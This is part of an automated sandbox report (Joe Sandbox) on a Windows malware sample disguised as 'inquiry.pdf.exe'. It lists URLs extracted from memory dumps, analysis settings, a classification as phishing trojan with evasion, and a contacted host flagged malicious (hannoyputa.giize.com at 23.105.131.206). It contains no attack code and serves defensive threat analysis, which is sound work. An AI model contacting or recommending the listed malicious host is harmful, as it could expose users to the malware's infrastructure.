                                          http://www.jiyu-kobo.co.jp/ueTinquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/Yinquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comdvinquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/inquiry.pdf.exe, 00000000.00000003.274291319.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comTCinquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Oinquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/jp/inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comdinquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comI.TTF6inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271546551.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271631731.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271758905.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comalsF5inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comdvainquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comlinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Y0=inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.founder.com.cn/cn/inquiry.pdf.exe, 00000000.00000003.261470904.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261541124.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261568725.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.carterandcone.commbeinquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.founder.com.cn/cninquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comItainquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/vinquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/s-einquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlinquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/vadinquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.carterandcone.como.(inquiry.pdf.exe, 00000000.00000003.261955611.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261989796.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.fontbureau.comminquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/k-uinquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ns.adobe.cobjImtglonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.carterandcone.comgoinquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zhongyicts.com.cno.inquiry.pdf.exe, 00000000.00000003.261927166.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comersinquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/nyginquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/syohex/java-simple-mine-sweeperC:inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn&inquiry.pdf.exe, 00000000.00000003.261291352.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.comsiefinquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          23.105.131.206
                                                          		hannoyputa.giize.comUnited States
                                                          		396362LEASEWEB-USA-NYC-11UStrue
                                                          142.250.203.100
                                                          		www.google.comUnited States
                                                          		15169GOOGLEUSfalse

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:715157
                                                          Start date and time:2022-10-03 17:27:43 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 24s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:inquiry.pdf.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:27
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.phis.troj.expl.evad.winEXE@29/9@7/3
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 102
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com
                                                          • Execution Graph export aborted for target inquiry.pdf.exe, PID 5896 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          17:29:07API Interceptor1x Sleep call for process: inquiry.pdf.exe modified
                                                          17:30:32API Interceptor14x Sleep call for process: glonkjhg.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
